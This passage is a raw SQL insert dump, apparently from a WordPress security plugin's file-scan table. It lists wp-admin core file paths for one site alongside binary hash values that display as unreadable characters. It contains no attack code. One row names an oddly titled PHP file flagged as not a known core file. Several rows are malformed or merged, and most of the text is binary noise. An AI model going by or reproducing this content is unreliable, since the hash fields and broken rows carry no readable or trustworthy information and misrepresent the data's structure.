+9U','wp-admin/js/customize-widgets.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','19Lyƾ',':1-)\r e.ySXMqv-','',0,'?'),('ĸ:,p1Hr','wp-admin/js/dashboard.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/dashboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4v[r(','2̇!UJ;D','wp-admin/js/dashboard.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/dashboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 1S|','\Z>\\2q غHt(bW]rDB5','',0,'?'),('`%ֽj\'P','wp-admin/js/edit-comments.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/edit-comments.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','af~g2PZ8',' )%TL?#-.Ʉ','',0,'?'),('F\'B/4{J{w','wp-admin/js/edit-comments.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/edit-comments.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HثWE\'3K ','wdXuZ~~0HZl\0\'&Ƌ^','',0,'?'),('R5?- S^H','wp-admin/js/editor-expand.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/editor-expand.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K\\(p[',';W#}Gj[KSAKZiˤ[Q4c\n','',0,'?'),('IV/6s ','wp-admin/js/editor-expand.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/editor-expand.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N~\"( J0Ko\r','gN{U/j<} o<_','',0,'?'),('8=Ia%k~','wp-admin/js/editor.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y e',': z=:&%@x? ScS','',0,'?'),('⣣MOU','wp-admin/js/editor.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','= Βy','ڒeyѿHKt%\" ֩k','',0,'?'),(';RyhRxK\r','wp-admin/js/farbtastic.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/farbtastic.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rJgrTb;un*','M_ `9h*/s','',0,'?'),('/GΞӶ[ǜC','wp-admin/js/gallery.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':kvT\'nd','y=]\Zs]jp̛ׅ6bva','',0,'?'),(' I_X?','wp-admin/js/gallery.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V \r~7xDecb','У0 #u\r/ L:hJR\'9k','',0,'?'),('G_bc.,]&','wp-admin/js/image-edit.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/image-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/Q3ct[<L','a!P\r?+`Rg+q?iǺ_B','',0,'?'),('-Z:E:','wp-admin/js/image-edit.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/image-edit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' K`{','aSI˘W}\n4PT,S','',0,'?'),('lFc뒕L','wp-admin/js/iris.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/iris.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','22?ޡ{','dUD2G#lk^[\Z','',0,'?'),('i\\=Xh$','wp-admin/js/language-chooser.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/language-chooser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӥ kulLS',' r4i j\"܈6&','',0,'?'),('Z\Zxcyd\'','wp-admin/js/language-chooser.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/language-chooser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U>p4Jl5=','9\rXLdC5@UK&>̓l#','',0,'?'),('QR\"@ 3vS','wp-admin/js/link.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/link.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','϶5֞P','Onn˕{?Q!=Voi','',0,'?'),('|#԰#{','wp-admin/js/link.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/link.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nwhs[','y׈h8Hi* \r!4*<9gV\"U','',0,'?'),('nZ/1T:{&^/n','wp-admin/js/media-gallery.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/media-gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_85o?','Ƥ$30IXC,b\"0lNF','',0,'?'),(':%H`!\rZ','wp-admin/js/media-gallery.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/media-gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%gUsbK','OH+ܽg\"{CvFBt1','',0,'?'),('^\\X PvS\\{','wp-admin/js/media-upload.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/media-upload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F߻V?an\r','Ea,\Z,yM/\\iQӠ\"?28','',0,'?'),('el5sEúQ','wp-admin/js/media-upload.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/media-upload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WC}KF j','w@S¼|\r>R4\nN3YsS','',0,'?'),('r(n՞jb\" ','wp-admin/js/media.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/media.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^qi','ϑ톳dJ6kE?$ Hkdô','',0,'?'),('מy7mE5O_','wp-admin/js/media.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/media.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nL\"j uA','XmCR\Z_rZVm3sy@\"1#','',0,'?'),(' It13&','wp-admin/js/nav-menu.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/nav-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?Qh%| s','|+7vʱ*XlK ̽8M+;','',0,'?'),('fyħ*!','wp-admin/js/nav-menu.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/nav-menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gjd$]L9','+`ٚS6!hˣn','',0,'?'),('\"\rJ\04\'i','wp-admin/js/password-strength-meter.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/password-strength-meter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʃD)an','`)CELdX\\&F-V7+1SA','',0,'?'),('Ȁ~_qIS','wp-admin/js/password-strength-meter.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/password-strength-meter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z3r ;]<|','1y吥!}}3ɻ}}te\nt','',0,'?'),('|C-6(Çzp','wp-admin/js/password-toggle.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/password-toggle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';\0N6ޯ','k!.߀fǿx`7{','',0,'?'),('Evm1 U~AHj','wp-admin/js/password-toggle.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/password-toggle.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j\"»V','nߗ\"q{KuKZK\r1^','',0,'?'),('t6O\raȆf','wp-admin/js/plugin-install.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/plugin-install.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','chPP\rDW',') $K8v3X&okv','',0,'?'),('!Y0-z1dm>','wp-admin/js/plugin-install.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/plugin-install.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q܂y|RCgX/','?UաNkhkGQTҗ[0N-','',0,'?'),('V댏$x','wp-admin/js/post.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oDCwKc=w(','# pgN[\n߀^4(rV\Z|','',0,'?'),('M?,5*K*f','wp-admin/js/post.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0jocl!?9)B','!TԖ鶑\\c5qw.t','',0,'?'),('P\'(?+z$','wp-admin/js/postbox.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/postbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g=%(\Zf690','Ia1%&ܜa;^%3isJ','',0,'?'),('ORrD?','wp-admin/js/postbox.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/postbox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^V2W?*]\0','Ѧ9O*\ZvuJT6~Aj|T','',0,'?'),(' AFk','wp-admin/js/privacy-tools.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/privacy-tools.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.Xc\rn','9=+*}4-o5 H[L檰','',0,'?'),('fŭ8;slV','wp-admin/js/privacy-tools.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/privacy-tools.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eo`Q[.','_A6}K\r9@\rroN\Z','',0,'?'),('\\9ѕFw','wp-admin/js/revisions.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LOeznUR','q :\\H-ƒViԍ$','',0,'?'),('keߦ J`~','',0,'?'),('TgslFʞLy','wp-admin/js/set-post-thumbnail.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/set-post-thumbnail.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1PNH9e @I','e}#nqJ rJQ)(nuS','',0,'?'),('km|Kma0\"*k','wp-admin/js/tags-suggest.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/tags-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')fՀ(\rq','.H ߮=;g\"=3jU','',0,'?'),('{tE~PA1','wp-admin/js/tags.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/tags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=<@7K>ʹ3h','ѷfR*z;ܓ`c6|F3','',0,'?'),('fkjNUei4=%','wp-admin/js/tags.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/tags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0}0RMT ',' VkKCoό8TAyn@Z\0','',0,'?'),('@F Ӡ(e*[','wp-admin/js/theme-plugin-editor.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/theme-plugin-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-J~',' |DO?{ٿ%זY}О','',0,'?'),('Nxډ\Z8yH\\','wp-admin/js/theme-plugin-editor.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/theme-plugin-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?tS~5~','wT}υ*e}vW*!EH','',0,'?'),('#\\/vXR','wp-admin/js/theme.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>ѕ [sNϸ~G','{g]!cj8 ~z-8ki','',0,'?'),('G6U2\01RJ','wp-admin/js/theme.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$߮ȼԔZH&',' +?uCȗENEi{_\"֥5̈[','',0,'?'),('+9[BUE e','wp-admin/js/updates.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/updates.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4n<ђA','\Z8D+Ee?|IV\0Nf;w\'','',0,'?'),('([dBQ','wp-admin/js/updates.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/updates.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','±O.N2X','9͌7KD<_~:kN7YH','',0,'?'),('\'>[·','wp-admin/js/user-profile.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/user-profile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'VB','7W,%{!i:^&G`O,','',0,'?'),('HS!; ','wp-admin/js/user-profile.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/user-profile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3xYfqTe$^\'','0Ǐj4GE?([:^yc.N','',0,'?'),('R¥Leq &','wp-admin/js/user-suggest.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/user-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jl,f.Vh','\ZԂ 8՜g\\ISグ6','',0,'?'),('X$aB^','wp-admin/js/user-suggest.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/user-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6|3sJ:+IV','nj0BȠ|qO F>g#','',0,'?'),('&Ż(','wp-admin/js/widgets/custom-html-widgets.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/custom-html-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K kc\'','r=,kM:DyKF~sS|ğZ','',0,'?'),('{\nRoR=\'g','wp-admin/js/widgets/custom-html-widgets.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/custom-html-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$[!x{LRoq','ԫ/~ؿCt.R 7WQL+ݳR','',0,'?'),('K]Cl7:D\0','wp-admin/js/widgets/media-audio-widget.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/media-audio-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P IM;p8vn[S','9jlxBeH:y%}c TP_','',0,'?'),('<|~E.Y^!]','wp-admin/js/widgets/media-audio-widget.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/media-audio-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ntw|茇^\rݾm','',0,'?'),('~K ɁwwfC','wp-admin/js/widgets/media-gallery-widget.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/media-gallery-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{c/I<','y\\RTܠUtmY(㻱̿','',0,'?'),('yA0Xz(\'\\','wp-admin/js/widgets/media-gallery-widget.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/media-gallery-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wl3IEh','ZhX\0 ,P6[=2޸','',0,'?'),('4y3%k ','wp-admin/js/widgets/media-image-widget.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/media-image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';k#?cQ7(e','o{\rrh5Fww LeFz]','',0,'?'),('|N!;xN&gm','wp-admin/js/widgets/media-image-widget.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/media-image-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G 9FmqQ','J6%V\"\rKyɳh8NF','',0,'?'),('5ڜ2l2{','wp-admin/js/widgets/media-video-widget.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/media-video-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ܥd|QSn','R;Twhm^䜺KLA','',0,'?'),('˥̰MVЗ eA','wp-admin/js/widgets/media-video-widget.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/media-video-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VU6D]C','W_T>)Rp>n}Pmz\0 :sc','',0,'?'),('ņLGP(Ήȯ','wp-admin/js/widgets/media-widgets.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/media-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"׋@/a','WI`63XAb#;rv {Mp6','',0,'?'),('Q;(Mp*','wp-admin/js/widgets/media-widgets.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/media-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yM_ Q.\rv9','=W@EH\Z\Z+m+Mz','',0,'?'),('$TX@#A','wp-admin/js/widgets/text-widgets.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/text-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z÷C6ؠ+','>X7T\Z&~27Z=JÜ-','',0,'?'),('bpA+-+ʉ','wp-admin/js/widgets/text-widgets.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets/text-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(APPu4Ą','v5ᐪmє\"-*~``Qg1F/','',0,'?'),('Sx4@owN','wp-admin/js/widgets.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}Ah%Z2v','O嶖3HD@R\\*.RP','',0,'?'),('P73o \0=','wp-admin/js/word-count.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/word-count.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rffB)','6j,AުǭsDeCz&\n','',0,'?'),('Cg}|E','wp-admin/js/word-count.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/word-count.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xgU0V','0twTz+of/\rh','',0,'?'),('v4|><','wp-admin/js/xfn.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/xfn.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wcW_~\r1>p','4[Ÿ$[\\Ə4-3zx','',0,'?'),('頻yN<9o\Z< ','wp-admin/js/xfn.min.js','/home/tummmyov/tummyrevolution.com/wp-admin/js/xfn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<>B25\r1U*','O h^dLgzIwvƄaZ1','',0,'?'),('|Y> Ɔ','wp-admin/link-add.php','/home/tummmyov/tummyrevolution.com/wp-admin/link-add.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nPU-\r`(l','!>e:Ⓝ?\r}k?ms','',0,'?'),('B%v6I\"Jb4ӡT','wp-admin/link-manager.php','/home/tummmyov/tummyrevolution.com/wp-admin/link-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UE~_a','T:LLhҬ~PW\n','',0,'?'),(' ~rC','wp-admin/link-parse-opml.php','/home/tummmyov/tummyrevolution.com/wp-admin/link-parse-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/-^X','E=cdh!Xe,`gs.#','',0,'?'),(':{{79','wp-admin/link.php','/home/tummmyov/tummyrevolution.com/wp-admin/link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>d|2˒*5=','A` \\][9\Z\0 d ZO','',0,'?'),('6]jvWk\r3-','wp-admin/load-scripts.php','/home/tummmyov/tummyrevolution.com/wp-admin/load-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8|=]gY[\0M','%`ĸX&IJǼ=~~bF]FSDR','',0,'?'),('W})Ӗ7e}59,','wp-admin/load-styles.php','/home/tummmyov/tummyrevolution.com/wp-admin/load-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';7%W9C0R','dC;U~1SvK\r\'cdyonw\"ЏR','',0,'?'),('KOȖ93|<','wp-admin/maint/repair.php','/home/tummmyov/tummyrevolution.com/wp-admin/maint/repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\?D>%j D','Ւd!ӢHrƄ=/]v|Hp','',0,'?'),('J{ֹZi^ùxI','wp-admin/media-new.php','/home/tummmyov/tummyrevolution.com/wp-admin/media-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','낥ҰۨݔeN','xE)O8y\ntޖU_Az}[u','',0,'?'),('}','wp-admin/media-upload.php','/home/tummmyov/tummyrevolution.com/wp-admin/media-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\nx\rO2P ','j+]-HOgĩ>\"O,','',0,'?'),('ÏuL,&Ǒ\r1','wp-admin/media.php','/home/tummmyov/tummyrevolution.com/wp-admin/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z\\-cYD','L!Ve48o_5r','',0,'?'),('$īI^3','wp-admin/menu-header.php','/home/tummmyov/tummyrevolution.com/wp-admin/menu-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':º!h!(','JI֔@(RNbӱ no_','',0,'?'),('\\D >F,','wp-admin/menu.php','/home/tummmyov/tummyrevolution.com/wp-admin/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ew* ','~SX m2qG[\0 |','',0,'?'),('W{g- X\'=n8','wp-admin/moderation.php','/home/tummmyov/tummyrevolution.com/wp-admin/moderation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZEVUu','Fq61 <wt&b1','',0,'?'),('vw@HzF','wp-admin/ms-admin.php','/home/tummmyov/tummyrevolution.com/wp-admin/ms-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' UjAڦYqu ','\"G\nڔMhQ2l\'ܵ','',0,'?'),('&ee\n3KvZ','wp-admin/ms-delete-site.php','/home/tummmyov/tummyrevolution.com/wp-admin/ms-delete-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','COL*p>[','','',0,'?'),('EV,%,SM=','wp-admin/ms-edit.php','/home/tummmyov/tummyrevolution.com/wp-admin/ms-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P3\n7|L?MtA','acsc\Z\"VL\\њ','',0,'?'),('\"(}Gr 0V(','wp-admin/ms-options.php','/home/tummmyov/tummyrevolution.com/wp-admin/ms-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~<bs\'+\ZQ','qJR_+VC%~d35kx','',0,'?'),('-18;T/X]','wp-admin/ms-sites.php','/home/tummmyov/tummyrevolution.com/wp-admin/ms-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f3&S7F76',',$yn)RHgh{$U','',0,'?'),('=b6hst','wp-admin/ms-themes.php','/home/tummmyov/tummyrevolution.com/wp-admin/ms-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':1R] lI!#_J','7EH PuZbG','',0,'?'),('\\9','wp-admin/ms-upgrade-network.php','/home/tummmyov/tummyrevolution.com/wp-admin/ms-upgrade-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qc8E%!',' H_cQX̤ՏLsڭ','',0,'?'),('kULǡ$','wp-admin/ms-users.php','/home/tummmyov/tummyrevolution.com/wp-admin/ms-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','³u~]*Cu\0','es}k_q}~G[5Qu!','',0,'?'),('\rxݍ^\Z<;','wp-admin/my-sites.php','/home/tummmyov/tummyrevolution.com/wp-admin/my-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/tf:is','6K\\6qXF$PB C','',0,'?'),('Clo','wp-admin/nav-menus.php','/home/tummmyov/tummyrevolution.com/wp-admin/nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʹNa :MD','A\\O 0AӇ5DSJCD0','',0,'?'),('ol>x~I ','wp-admin/network/about.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~(4G','j/}Ӆ\0ES̤\\Hg#Z._','',0,'?'),('ZQ4\\(܇','wp-admin/network/admin.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϯ\r&Z3r\"',':%;KiW@>U;#>','',0,'?'),('RM<60%;','wp-admin/network/contribute.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/contribute.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' cyJߛB\0','CKdSISߪի,<,F','',0,'?'),('+t%R?','wp-admin/network/credits.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B+KVe=','WNhK2ZFW\r0 8J5','',0,'?'),('\'ڞ\0;?+VҪ','wp-admin/network/edit.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=#LH','q/*߲3xS~.\']wk,W','',0,'?'),('!.N\nqLgG','wp-admin/network/error_log','/home/tummmyov/tummyrevolution.com/wp-admin/network/error_log',0,'.\0?Ɇp','.\0?Ɇp','A%xK!^9Ɩ_ayV|HJ','',0,'?'),('uF^GE+c','wp-admin/network/freedoms.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u6|tJ41','B;M7߃[9H\r5:6','*]X8%KқR Qf;\ne\r6\\','',0,'?'),('=}C iHT','wp-admin/network/profile.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E3@%c ','\\H.77QtUwݰAK,$A!Lz','',0,'?'),('\Za]]A\'h','wp-admin/network/settings.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S]֫NŜpN',']O}cB[.n+It4lX|','',0,'?'),('/sC4','wp-admin/network/setup.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' wTA;}Ad','韌\'MN+ƺRg','',0,'?'),('+G*#f','wp-admin/network/site-info.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/site-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')\\@]=','h|)=\Z$x+%l!>[','',0,'?'),('yG\\`MR','wp-admin/network/site-new.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/site-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zꩦg1r24','JBv\Zbela(\ri`^ j: JV<','',0,'?'),('yc0Og)ρMf','wp-admin/network/site-settings.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/site-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','abcS%[','XDvX5҄:,̪zj ','',0,'?'),('qhBc92','wp-admin/network/site-themes.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/site-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÏODvur#9','R 2@:3W]gK@2N','',0,'?'),('q@/ꦑٞ-M','wp-admin/network/site-users.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/site-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pXW o ٷF','&I5h@d;^O aC','',0,'?'),('n@AF','wp-admin/network/sites.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6U𼗆.ג\"','kB(?忭Pq~cKE8M?','',0,'?'),('{N2Qu= ','wp-admin/network/theme-editor.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','( aԢ[U?',' ЈegTG.=a\0@','',0,'?'),('!Lb0TQi)E','wp-admin/network/theme-insnqkr.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/theme-insnqkr.php',0,'\07bkOM','\07bkOM','4\'F zֵOj炷 \r/EE','',0,'?'),('h|hEf:Ʊ2~','wp-admin/network/theme-install.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','堷ȹH^r','fkL\Z)h/F_M9jV','',0,'?'),('!}=`*gZ=','wp-admin/network/themes.php','/home/tummmyov/tummyrevolution.com/wp-admin/network/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<9[ 